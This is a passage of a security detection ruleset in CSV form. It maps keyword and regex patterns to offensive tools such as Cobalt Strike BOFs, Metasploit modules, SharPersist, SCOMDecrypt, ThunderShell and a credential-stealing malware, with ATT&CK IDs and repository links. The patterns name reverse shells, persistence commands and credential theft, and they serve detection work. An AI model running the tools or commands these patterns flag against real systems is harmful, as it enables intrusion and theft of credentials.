Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*schtask_callback*",".{0,1000}schtask_callback.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*SchTaskBackdoor.*",".{0,1000}SchTaskBackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*schtasks /create /tn ""CursorSvc""*",".{0,1000}schtasks\s\/create\s\/tn\s\""CursorSvc\"".{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*schtasks /create /tn *Constants.PERSISTENCE_WINDOWS_TASK +*",".{0,1000}schtasks\s\/create\s\/tn\s.{0,1000}Constants\.PERSISTENCE_WINDOWS_TASK\s\+.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*schtasks_elevator*",".{0,1000}schtasks_elevator.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*schtasks_exploit *",".{0,1000}schtasks_exploit\s.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*schtasksabuse.rb*",".{0,1000}schtasksabuse\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*SchTasksImplant*",".{0,1000}SchTasksImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*schtquery * full*",".{0,1000}schtquery\s.{0,1000}\sfull.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*SCNotification.exe.config.malicious*",".{0,1000}SCNotification\.exe\.config\.malicious.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","1","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*SCOMDecrypt.csproj*",".{0,1000}SCOMDecrypt\.csproj.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*SCOMDecrypt.exe*",".{0,1000}SCOMDecrypt\.exe.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*SCOMDecrypt.ps1*",".{0,1000}SCOMDecrypt\.ps1.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*screen_spy.rb*",".{0,1000}screen_spy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*screengrab.exe*",".{0,1000}screengrab\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*screenshot_inject *",".{0,1000}screenshot_inject\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*screenspy.rb*",".{0,1000}screenspy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Screetsec*",".{0,1000}Screetsec.{0,1000}","offensive_tool_keyword","Github Username","github username hosting post exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*screetsec/Microsploit*",".{0,1000}screetsec\/Microsploit.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","435","135","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" "*screetsec/Pateensy*",".{0,1000}screetsec\/Pateensy.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*screetsec/Sudomy*",".{0,1000}screetsec\/Sudomy.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1853","366","2024-02-19T14:38:48Z","2019-07-26T10:26:34Z" "*screetsec/Vegile*",".{0,1000}screetsec\/Vegile.{0,1000}","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","695","162","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" "*--script broadcast-dhcp-discover*",".{0,1000}\-\-script\sbroadcast\-dhcp\-discover.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*script/xor-bin.py*",".{0,1000}script\/xor\-bin\.py.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","3","203","37","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*script_main(wraith, cmdline)*",".{0,1000}script_main\(wraith,\scmdline\).{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*scripthost_uac_bypass*",".{0,1000}scripthost_uac_bypass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*scripts*Remote-WmiExecute.*",".{0,1000}scripts.{0,1000}Remote\-WmiExecute\..{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*scripts*Search-EventForUser.ps1*",".{0,1000}scripts.{0,1000}Search\-EventForUser\.ps1.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*scripts/ghauri.py*",".{0,1000}scripts\/ghauri\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","1","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*scripts\ghauri.py*",".{0,1000}scripts\\ghauri\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*ScriptSentry-main.zip*",".{0,1000}ScriptSentry\-main\.zip.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*ScRunBase32.exe*",".{0,1000}ScRunBase32\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","178","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "*ScRunBase32.py*",".{0,1000}ScRunBase32\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","178","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "*ScRunBase64.exe*",".{0,1000}ScRunBase64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","178","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "*ScRunBase64.py*",".{0,1000}ScRunBase64\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","178","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "*scshell*XblAuthManager*",".{0,1000}scshell.{0,1000}XblAuthManager.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*SCShell.exe*",".{0,1000}SCShell\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*scshell.py*",".{0,1000}scshell\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 